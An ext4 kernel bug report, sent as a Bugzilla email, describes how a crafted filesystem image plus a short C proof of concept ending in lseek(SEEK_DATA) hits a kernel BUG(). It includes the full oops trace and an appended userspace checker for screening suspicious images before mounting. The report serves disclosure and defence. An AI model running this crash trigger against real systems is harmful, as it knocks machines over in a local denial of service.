Message-ID: <bug-200623-13602@https.bugzilla.kernel.org/>
Date:   Sun, 22 Jul 2018 19:50:46 +0000
From:   bugzilla-daemon@...zilla.kernel.org
To:     linux-ext4@...nel.org
Subject: [Bug 200623] New: BUG() in ext4_es_find_delayed_extent_range() when
 operating a corrupted image

https://bugzilla.kernel.org/show_bug.cgi?id=200623

            Bug ID: 200623
           Summary: BUG() in ext4_es_find_delayed_extent_range() when
                    operating a corrupted image
           Product: File System
           Version: 2.5
    Kernel Version: 4.18
          Hardware: All
                OS: Linux
              Tree: Mainline
            Status: NEW
          Severity: normal
          Priority: P1
         Component: ext4
          Assignee: fs_ext4@...nel-bugs.osdl.org
          Reporter: wen.xu@...ech.edu
        Regression: No

Created attachment 277465
  --> https://bugzilla.kernel.org/attachment.cgi?id=277465&action=edit
The (compressed) crafted image which causes the crash

- Reproduce
# mkdir mnt
# mount -t ext4 15.img mnt
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE             /* SEEK_DATA */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/*
 * Run with the crafted image mounted at argv[1]. A read, a short pwrite
 * and a SEEK_DATA lseek on foo/bar/æøå are enough to reach the BUG_ON() in
 * ext4_es_find_delayed_extent_range() via the lseek path shown in the call
 * trace. The raw syscall()s of the generated PoC are replaced here by the
 * libc wrappers with the same arguments; the unused file-name strings are
 * dropped and the buffers are left uninitialised, as in the original.
 */
int main(int argc, char *argv[])
{
        unsigned char v0[8192];
        unsigned char v1[8192];
        const char *path = "foo/bar/æøå";
        int fd;

        if (argc != 2) {
                fprintf(stderr, "usage: %s <mountpoint>\n", argv[0]);
                return 1;
        }
        if (chdir(argv[1]) < 0) {
                perror("chdir");
                return 1;
        }
        fd = open(path, O_RDWR);        /* SYS_open with flags 2 == O_RDWR */
        if (fd < 0) {
                perror(path);
                return 1;
        }
        read(fd, v0, 7424);             /* SYS_read */
        pwrite(fd, v1, 441, 6842);      /* SYS_pwrite64 */
        lseek(fd, 3474, SEEK_DATA);     /* SYS_lseek, whence 3 == SEEK_DATA: the crashing call */

        close(fd);
        return 0;
}

- Kernel message
[13983.726442] EXT4-fs: Warning: mounting with data=journal disables delayed allocation and O_DIRECT support!
[13983.783120] EXT4-fs (loop0): mounted filesystem with journalled data mode. Opts: (null)
[14000.138283] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group 0, block bitmap and bg descriptor inconsistent: 7011 vs 7022 free clusters
[14000.141268] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group 1, block bitmap and bg descriptor inconsistent: 7037 vs 7038 free clusters
[14000.144276] ------------[ cut here ]------------
[14000.144284] kernel BUG at fs/ext4/extents_status.c:253!
[14000.145732] invalid opcode: 0000 [#1] SMP KASAN PTI
[14000.146787] CPU: 0 PID: 1576 Comm: a.out Not tainted 4.18.0-rc4+ #1
[14000.148076] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[14000.150039] RIP: 0010:ext4_es_find_delayed_extent_range+0x2cb/0x2d0
[14000.151300] Code: 48 89 de e8 17 2a f2 00 4c 89 ef e8 ff d0 eb ff 4d 8b 75 00 4d 85 f6 75 d3 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 0f 0b <0f> 0b 0f 1f 00 66 66 66 66 90 55 48 89 e5 41 57 41 56 41 89 d6 48
[14000.155067] RSP: 0018:ffff8801db3c7bf8 EFLAGS: 00010297
[14000.156124] RAX: 0000000000000000 RBX: ffff8801ebfeb478 RCX: ffff8801db3c7ce8
[14000.157555] RDX: 0000000000001900 RSI: 0000000000001901 RDI: ffff8801ebfeb478
[14000.158975] RBP: ffff8801db3c7d70 R08: ffff8801db3c7878 R09: ffffed003d7fd6e3
[14000.160396] R10: 0000000000010000 R11: ffffed003d7fd6e2 R12: 0000000000000000
[14000.161826] R13: ffff8801db3c7dc8 R14: ffff8801db3c7d48 R15: 0000000000001900
[14000.163237] FS:  00007fcccc2fb700(0000) GS:ffff8801f7200000(0000) knlGS:0000000000000000
[14000.164835] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[14000.169757] CR2: 00007ffc2ca331a0 CR3: 00000001ee168000 CR4: 00000000000006f0
[14000.171222] Call Trace:
[14000.171753]  ? ext4_iomap_begin+0x641/0x7a0
[14000.172616]  ? ext4_dio_get_block+0x80/0x80
[14000.173488]  ? ext4_file_read_iter+0xa0/0x170
[14000.174398]  ? __vfs_read+0x2a6/0x400
[14000.175152]  ? __vfs_write+0x286/0x410
[14000.175923]  ? kernel_read+0xa0/0xa0
[14000.176661]  iomap_apply+0xd7/0x200
[14000.177392]  ? iomap_seek_hole_actor+0x80/0x80
[14000.178302]  ? iomap_dirty_actor+0x310/0x310
[14000.179174]  iomap_seek_data+0x7c/0xb0
[14000.179942]  ? iomap_seek_hole_actor+0x80/0x80
[14000.180847]  ext4_llseek+0x123/0x160
[14000.181599]  ksys_lseek+0x9e/0xd0
[14000.182282]  __x64_sys_lseek+0x43/0x50
[14000.183053]  do_syscall_64+0x78/0x170
[14000.183816]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[14000.184854] RIP: 0033:0x7fcccbe174d9
[14000.185599] Code: 00 f3 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 8f 29 2c 00 f7 d8 64 89 01 48
[14000.189398] RSP: 002b:00007ffc2ca310c8 EFLAGS: 00000286 ORIG_RAX: 0000000000000008
[14000.190913] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fcccbe174d9
[14000.192341] RDX: 0000000000000003 RSI: 0000000000000d92 RDI: 0000000000000003
[14000.193782] RBP: 00007ffc2ca351b0 R08: 00007ffc2ca35298 R09: 00007ffc2ca35298
[14000.195216] R10: 00007ffc2ca35298 R11: 0000000000000286 R12: 0000000000400530
[14000.196652] R13: 00007ffc2ca35290 R14: 0000000000000000 R15: 0000000000000000
[14000.198107] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi autofs4 btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq raid1 raid0 multipath linear 8139too qxl drm_kms_helper crct10dif_pclmul syscopyarea crc32_pclmul sysfillrect sysimgblt fb_sys_fops ttm drm aesni_intel aes_x86_64 crypto_simd cryptd glue_helper 8139cp mii pata_acpi floppy
[14000.209140] ---[ end trace 56aa4821a2231d02 ]---
[14000.210125] RIP: 0010:ext4_es_find_delayed_extent_range+0x2cb/0x2d0
[14000.211577] Code: 48 89 de e8 17 2a f2 00 4c 89 ef e8 ff d0 eb ff 4d 8b 75 00 4d 85 f6 75 d3 48 83 c4 10 5b 41 5c 41 5d 41 5e 41 5f 5d c3 0f 0b <0f> 0b 0f 1f 00 66 66 66 66 90 55 48 89 e5 41 57 41 56 41 89 d6 48
[14000.215601] RSP: 0018:ffff8801db3c7bf8 EFLAGS: 00010297
[14000.216700] RAX: 0000000000000000 RBX: ffff8801ebfeb478 RCX: ffff8801db3c7ce8
[14000.218162] RDX: 0000000000001900 RSI: 0000000000001901 RDI: ffff8801ebfeb478
[14000.219648] RBP: ffff8801db3c7d70 R08: ffff8801db3c7878 R09: ffffed003d7fd6e3
[14000.221112] R10: 0000000000010000 R11: ffffed003d7fd6e2 R12: 0000000000000000
[14000.222560] R13: ffff8801db3c7dc8 R14: ffff8801db3c7d48 R15: 0000000000001900
[14000.224047] FS:  00007fcccc2fb700(0000) GS:ffff8801f7200000(0000) knlGS:0000000000000000
[14000.225707] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[14000.226874] CR2: 00007ffc2ca331a0 CR3: 00000001ee168000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/v4.18-rc5/source/fs/ext4/extents_status.c#L252

Reported by Wen Xu (wen.xu@...ech.edu) from SSLab at Gatech.
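
- Added example (not part of the bug report or of the kernel)
The two "block bitmap and bg descriptor inconsistent" errors logged before the BUG() are the kernel's own mount-time symptom of a doctored image: ext4_mb_generate_buddy() counts the zero bits in a group's block bitmap and compares them with the free count stored in that group's descriptor. The program below replays that single comparison from userspace so an untrusted image can be screened before it is handed to the kernel parser. It is an added example written for this page; the on-disk offsets follow the ext4 format (superblock at byte 1024, descriptor table in the block after it), and it assumes no meta_bg and no bigalloc, handling 64bit descriptors through s_desc_size. The sample image it builds is constructed in memory, not produced by mke2fs. e2fsck -fn remains the authoritative check, and a clean pass is still no guarantee against a crafted image, so the safe policy is the one the reporter used: mount such images only inside a throwaway VM.

```c
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>

#define EXT4_SUPER_MAGIC  0xEF53
#define EXT4_SB_OFFSET    1024     /* the primary superblock always starts at byte 1024 */
#define INCOMPAT_META_BG  0x0010
#define INCOMPAT_64BIT    0x0080
#define INCOMPAT_BIGALLOC 0x0200
#define SAMPLE_IMAGE_LEN  (64 * 1024)

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | (uint32_t)rd16(p + 2) << 16; }
static void wr16(uint8_t *p, uint16_t v) { p[0] = v & 0xff; p[1] = v >> 8; }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

static uint32_t count_free_bits(const uint8_t *bm, uint32_t nbits) /* zero bits, as mb_find_next_zero_bit() walks them */
{
    uint32_t n = 0;
    for (uint32_t i = 0; i < nbits; i++) n += !(bm[i >> 3] & (1u << (i & 7)));
    return n;
}

/* Number of groups whose bg_free_blocks_count disagrees with the block bitmap
 * (0 = consistent), or -1 if the image is not an ext4 layout handled here
 * (assumption: no meta_bg, no bigalloc; 64bit descriptors sized by s_desc_size). */
int ext4_check_group_counts(const uint8_t *img, size_t len)
{
    if (len < EXT4_SB_OFFSET + 1024) return -1;
    const uint8_t *sb = img + EXT4_SB_OFFSET;
    if (rd16(sb + 56) != EXT4_SUPER_MAGIC) return -1;          /* s_magic */
    uint32_t log_bs = rd32(sb + 24), incompat = rd32(sb + 96); /* s_log_block_size, s_feature_incompat */
    if (log_bs > 6 || (incompat & (INCOMPAT_META_BG | INCOMPAT_BIGALLOC))) return -1;
    uint64_t bs = 1024ULL << log_bs, blocks = rd32(sb + 4);   /* s_blocks_count_lo */
    uint32_t first_data = rd32(sb + 20), bpg = rd32(sb + 32); /* s_first_data_block, s_blocks_per_group */
    uint32_t desc_size = 32;
    if (incompat & INCOMPAT_64BIT) {                           /* s_blocks_count_hi, s_desc_size */
        blocks |= (uint64_t)rd32(sb + 0x150) << 32;
        desc_size = rd16(sb + 254);
    }
    uint64_t gdt_off = (uint64_t)(first_data + 1) * bs;        /* GDT is in the block after the superblock */
    if (bpg == 0 || bpg > bs * 8 || blocks <= first_data || desc_size < 32 ||
        (desc_size & (desc_size - 1)) || gdt_off > len) return -1;
    uint64_t ngroups = (blocks - first_data + bpg - 1) / bpg;
    if (ngroups * desc_size > len - gdt_off) return -1;

    int bad = 0;
    for (uint64_t g = 0; g < ngroups; g++) {
        const uint8_t *gd = img + gdt_off + g * desc_size;
        uint64_t bitmap_blk = rd32(gd);                        /* bg_block_bitmap_lo */
        uint32_t desc_free = rd16(gd + 12);                    /* bg_free_blocks_count_lo */
        if (desc_size >= 64) {                                 /* _hi halves of both fields */
            bitmap_blk |= (uint64_t)rd32(gd + 32) << 32;
            desc_free |= (uint32_t)rd16(gd + 44) << 16;
        }
        if (bitmap_blk >= blocks || (bitmap_blk + 1) * bs > len) { bad++; continue; } /* bitmap off-image */
        uint32_t bm_free = count_free_bits(img + bitmap_blk * bs, bpg);
        if (bm_free != desc_free) {   /* the comparison ext4_mb_generate_buddy() makes on the live mount */
            fprintf(stderr, "group %llu: block bitmap and bg descriptor inconsistent: %u vs %u free\n",
                    (unsigned long long)g, bm_free, desc_free);
            bad++;
        }
    }
    return bad;
}

/* Constructed sample, not mke2fs output: 64 blocks of 1 KiB, one group, bitmap leaves
 * 43 blocks free; desc_free is what the descriptor claims (43 agrees, anything else does not). */
uint8_t *build_sample_image(uint16_t desc_free)
{
    static uint8_t buf[SAMPLE_IMAGE_LEN];
    uint8_t *sb = buf + EXT4_SB_OFFSET, *gd = buf + 2 * 1024, *bm = buf + 3 * 1024;
    memset(buf, 0, sizeof buf);
    wr32(sb + 4, 64);  wr32(sb + 20, 1);  wr32(sb + 32, 8192);  /* s_blocks_count_lo, s_first_data_block, s_blocks_per_group */
    wr16(sb + 56, EXT4_SUPER_MAGIC);                           /* s_log_block_size stays 0: 1 KiB blocks */
    wr32(gd, 3);                                               /* group 0 descriptor (block 2): bitmap in block 3 */
    wr16(gd + 12, desc_free);                                  /* bg_free_blocks_count_lo */
    memset(bm, 0xff, 1024);                                    /* all in use, including the pad past block 63 */
    for (uint32_t i = 20; i < 63; i++) bm[i >> 3] &= (uint8_t)~(1u << (i & 7)); /* blocks 21..63 free: 43 */
    return buf;
}

/* Screen an image file before it is handed to the kernel: ./ext4check 15.img */
int main(int argc, char *argv[])
{
    struct stat st;
    int fd = argc == 2 ? open(argv[1], O_RDONLY) : -1;
    if (fd < 0 || fstat(fd, &st) < 0) { fprintf(stderr, "usage: %s <ext4 image>\n", argv[0]); return 2; }
    const uint8_t *img = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
    if (img == MAP_FAILED) { perror("mmap"); return 2; }
    int bad = ext4_check_group_counts(img, (size_t)st.st_size);
    printf("%s: %s\n", argv[1], bad == 0 ? "group free counts consistent" :
           bad < 0 ? "not a supported ext4 image" : "INCONSISTENT, run e2fsck -fn before mounting");
    return bad == 0 ? 0 : 1;
}
```

On the reporter's image this check would flag groups 0 and 1 with the same 7011 vs 7022 and 7037 vs 7038 figures the kernel printed, since it counts the same bits over the same clusters_per_group window. It deliberately stops there: the BUG() itself is reached later, through the extent status tree on lseek(SEEK_DATA), which no descriptor check can predict, which is why the VM isolation matters more than the screen.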
